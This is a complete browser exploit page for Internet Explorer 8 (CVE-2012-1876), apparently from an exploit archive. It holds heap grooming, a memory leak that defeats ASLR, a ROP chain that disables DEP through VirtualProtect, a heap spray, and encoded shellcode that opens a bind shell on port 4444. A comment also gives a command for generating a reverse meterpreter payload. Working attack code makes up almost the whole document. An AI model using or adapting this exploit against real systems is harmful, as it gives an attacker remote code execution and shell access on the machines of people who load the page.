<!--
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
** Author: sickness@offsec.com
** Thanks to Ryujin, Dookie and mr_me :) for their help.
####################################################################
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
** Tested on Windows 7 (x86) - IE 8.0.7601.17514
** Old version of the exploit available at: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24017-old.zip
####################################################################
** The exploit bypasses ASLR without needing any NON-ASLR DLLs, using a leak :)
** To get it working on a different version of Windows you will need to make your own changes to the exploit :)
** Have fun :)
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
/**
 * Reassembles two UTF-16 code units into one 32-bit integer, low half first
 * (code unit 0 is the low 16 bits, code unit 1 the high 16 bits).
 * @param {string} str - string whose first two code units hold the value
 * @returns {number} the combined value; NaN if str has fewer than two code units
 */
function strtoint(str) {
var lowWord = str.charCodeAt(0);
var highWord = str.charCodeAt(1);
return highWord * 0x10000 + lowWord;
}
// --- Heap grooming (runs at script load, before any timer fires) ---------
// Three filler strings of at least 500 characters, each built by self-doubling.
var free = "EEEE";
while ( free.length < 500 ) free += free;

var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;

var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

// fr: strings that are released again below.
// al, bl: strings that stay alive; get_leak() later reads from bl[498].
var fr = new Array();
var al = new Array();
var bl = new Array();

// Hidden container for the <button> elements created in the loop.
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

// Interleave equal-sized string allocations ((0x100-6)/2 = 125 characters each)
// with <button> elements. Only even indices are filled; odd slots stay empty.
// `i` is declared here at script level and is reused by heapspray() below.
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}

// Release the fr strings from index 200 upward, forcing a collection after each
// one (CollectGarbage() is the IE/JScript-specific collector call); the al/bl
// strings and the buttons remain allocated.
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
/*
 * Third stage: builds the ROP chain + payload string and sprays copies of it
 * across the heap.
 *
 * cbuttonlayout: the base address computed by get_leak(). Every gadget and
 * data address below is a fixed offset added to it, so the chain only matches
 * the build named in the header ("Tested on Windows 7 (x86) - IE 8.0.7601.17514").
 *
 * Each address is formatted as hex, then split into two 4-digit halves: the
 * low half (substring(4,8)) is emitted first, so each "%u"+lo+"%u"+hi pair is
 * a little-endian dword. This assumes the sum has exactly 8 hex digits; a
 * smaller value would be split at the wrong position and nothing checks that.
 *
 * `rop` is re-declared with var many times; in JScript/JavaScript that is a
 * single hoisted binding reused as a scratch variable. The trailing "// } RET"
 * comments are copy-paste residue and do not describe those lines.
 */
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET

// The payload string: 14 dwords of filler, then the chain, then the payload.
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING

shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN

// Standard DEP bypass
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX (rop7/rop8 are the POP EBX gadget computed above)
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs

// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp
// You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le

shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");

// Total spray should be 1000
// Pad each repeat unit to exactly 1000 characters. This assumes
// shellcode.length <= 1000: substr() returns "" otherwise, and the unit would
// then be longer than 1000 characters with nothing here detecting it.
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);

shellcode+= padding;

// Grow the unit by self-doubling to at least 100000 characters so the
// substr() calls below always have enough source material.
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;

// One spray element: 16 chunks of 64*1024/2 characters (64 KiB of UTF-16 each)
// with the last chunk 38 bytes short, i.e. just under 1 MiB per string.
// `i` here is the script-level variable declared in the grooming loop, not a local.
var onemeg = shellcode.substr(0, 64*1024/2);

for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}

onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

// 100 copies of the ~1 MiB string, i.e. roughly 100 MiB of identical repeating
// content. The array is only referenced by this local and is not returned.
var spray = new Array();

for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
/**
 * First stage (fired from a timer): re-applies the width of the fixed-layout
 * <col id="132"> from the markup and raises its span from 9 to "19".
 * No return value; the effect is entirely on the DOM element.
 */
function leak(){
var colElement = document.getElementById("132");
colElement.width = "41";
colElement.span = "19";
}
/*
 * Second stage: derive the base address heapspray() needs and schedule the spray.
 *
 * Reads two UTF-16 code units of bl[498] at indices (0x100-6)/2+11 and +12,
 * i.e. indices 136 and 137 of a string that was created with only 125
 * characters in the grooming loop. Presumably the span change made in leak()
 * is what makes data readable there; in an unaffected engine substring()
 * yields "" and strtoint() returns NaN, and nothing below checks for that.
 */
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
// Build-specific delta from the leaked pointer down to the base that all
// heapspray() offsets are added to (see "Tested on" in the header).
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16); // debug leftover; only used by the commented-out alert
//alert(hex);
// Defer the spray by 50 ms instead of calling it inline.
setTimeout(function(){heapspray(str_addr)}, 50);
}
/**
 * Final stage (fired from a timer): sets an oversized width and a span of
 * "44" on the same <col id="132"> element that leak() modified.
 * No return value; the effect is entirely on the DOM element.
 */
function trigger_overflow(){
var colElement = document.getElementById("132");
colElement.width = "1245880";
colElement.span = "44";
}
// Stage sequencing, all delays relative to script execution:
//   400 ms: leak()             - changes the <col> span
//   450 ms: get_leak()         - reads from bl[498] and schedules heapspray() 50 ms later
//   700 ms: trigger_overflow() - sets the large width/span on the same <col>
// The timers only order the stages; nothing verifies that one stage succeeded
// before the next one fires.
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>